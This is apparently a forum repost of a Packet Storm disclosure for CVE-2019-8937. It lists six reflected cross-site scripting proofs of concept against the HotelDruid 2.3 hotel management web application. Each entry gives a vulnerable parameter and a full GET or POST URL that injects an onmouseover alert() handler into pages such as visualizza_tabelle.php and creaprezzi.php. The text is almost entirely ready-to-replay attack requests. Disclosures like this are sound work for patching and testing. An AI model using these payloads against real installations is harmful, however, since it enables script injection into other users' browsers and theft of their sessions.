HotelDruid 2.3 Cross Site Scripting

#232
Topic created · 1 Posts · 1 Views
  • HotelDruid version 2.3 suffers from a cross site scripting vulnerability.
    MD5 | bb6f0ac647f0bb871b072ea7758f4b32
    Download

    ===========================================================================================  
    # Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection  
    # CVE: CVE-2019-8937  
    # Date: 18-02-2019  
    # Exploit Author: Mehmet EMIROGLU  
    # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
    # Software Link: https://sourceforge.net/projects/hoteldruid/  
    # Version: v2.3  
    # Category: Webapps  
    # Tested on: Wamp64, @Win  
    # Software description: HotelDruid is a property management system (PMS)  
    designed to make hotel and hostel rooms  
    bed and breakfast apartments, or any other kind of daily rental easy to  
    manage from a web browser.  
    ===========================================================================================  
    # POC - XSS  
    # Parameters : nsextt  
    # Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22  
    # GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x"  
    onmouseover=alert(0x000981) x="  
    ===========================================================================================  
    ###########################################################################################  
    ===========================================================================================  
    # Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection  
    # CVE: CVE-2019-8937  
    # Date: 18-02-2019  
    # Exploit Author: Mehmet EMIROGLU  
    # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
    # Software Link: https://sourceforge.net/projects/hoteldruid/  
    # Version: v2.3  
    # Category: Webapps  
    # Tested on: Wamp64, @Win  
    # Software description: HotelDruid is a property management system (PMS)  
    designed to make hotel and hostel rooms  
    bed and breakfast apartments, or any other kind of daily rental easy to  
    manage from a web browser.  
    ===========================================================================================  
    # POC - XSS  
    # Parameters : cambia1  
    # Attack Pattern : " onmouseover="alert(8562604)  
    # POST Request :  
    http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"  
    onmouseover="alert(8562604)  
    # https://i.hizliresim.com/6avvoE.jpg  
    ===========================================================================================  
    ###########################################################################################  
    ===========================================================================================  
    # Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection  
    # CVE: CVE-2019-8937  
    # Date: 18-02-2019  
    # Exploit Author: Mehmet EMIROGLU  
    # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
    # Software Link: https://sourceforge.net/projects/hoteldruid/  
    # Version: v2.3  
    # Category: Webapps  
    # Tested on: Wamp64, @Win  
    # Software description: HotelDruid is a property management system (PMS)  
    designed to make hotel and hostel rooms  
    bed and breakfast apartments, or any other kind of daily rental easy to  
    manage from a web browser.  
    ===========================================================================================  
    # POC - XSS  
    # Parameters : mese_fine  
    # Attack Pattern : " onmouseover="alert(6520859)  
    # POST Request :  
    http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"  
    onmouseover="alert(6520859)  
    # https://i.hizliresim.com/v6NAzD.jpg  
    ===========================================================================================  
    ###########################################################################################  
    ===========================================================================================  
    # Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection  
    # CVE: CVE-2019-8937  
    # Date: 18-02-2019  
    # Exploit Author: Mehmet EMIROGLU  
    # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
    # Software Link: https://sourceforge.net/projects/hoteldruid/  
    # Version: v2.3  
    # Category: Webapps  
    # Tested on: Wamp64, @Win  
    # Software description: HotelDruid is a property management system (PMS)  
    designed to make hotel and hostel rooms  
    bed and breakfast apartments, or any other kind of daily rental easy to  
    manage from a web browser.  
    ===========================================================================================  
    # POC - XSS  
    # Parameters : origine  
    # Attack Pattern : " onmouseover="alert(8987004))  
    # POST Request :  
    http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"  
    onmouseover="alert(8987004)  
    # https://i.hizliresim.com/v6NAmO.jpg  
    ===========================================================================================  
    ###########################################################################################  
    ===========================================================================================  
    # Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection  
    # CVE: CVE-2019-8937  
    # Date: 18-02-2019  
    # Exploit Author: Mehmet EMIROGLU  
    # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
    # Software Link: https://sourceforge.net/projects/hoteldruid/  
    # Version: v2.3  
    # Category: Webapps  
    # Tested on: Wamp64, @Win  
    # Software description: HotelDruid is a property management system (PMS)  
    designed to make hotel and hostel rooms  
    bed and breakfast apartments, or any other kind of daily rental easy to  
    manage from a web browser.  
    ===========================================================================================  
    # POC - XSS  
    # Parameters : anno  
    # Attack Pattern : " onmouseover="alert(1548690)  
    # POST Request :  
    http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"  
    onmouseover="alert(1548690)  
    # https://i.hizliresim.com/EmAW68.jpg  
    ===========================================================================================  
    ###########################################################################################  
    ===========================================================================================  
    # Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection  
    # CVE: CVE-2019-8937  
    # Date: 18-02-2019  
    # Exploit Author: Mehmet EMIROGLU  
    # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
    # Software Link: https://sourceforge.net/projects/hoteldruid/  
    # Version: v2.3  
    # Category: Webapps  
    # Tested on: Wamp64, @Win  
    # Software description: HotelDruid is a property management system (PMS)  
    designed to make hotel and hostel rooms  
    bed and breakfast apartments, or any other kind of daily rental easy to  
    manage from a web browser.  
    ===========================================================================================  
    # POC - XSS  
    # Parameters : origine  
    # Attack Pattern : " onmouseover="alert(6332576)  
    # POST Request :  
    http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"  
    onmouseover="alert(6332576)  
    # https://i.hizliresim.com/EmAW68.jpg  
    ===========================================================================================  
    

    Source: packetstormsecurity.com

Log in to reply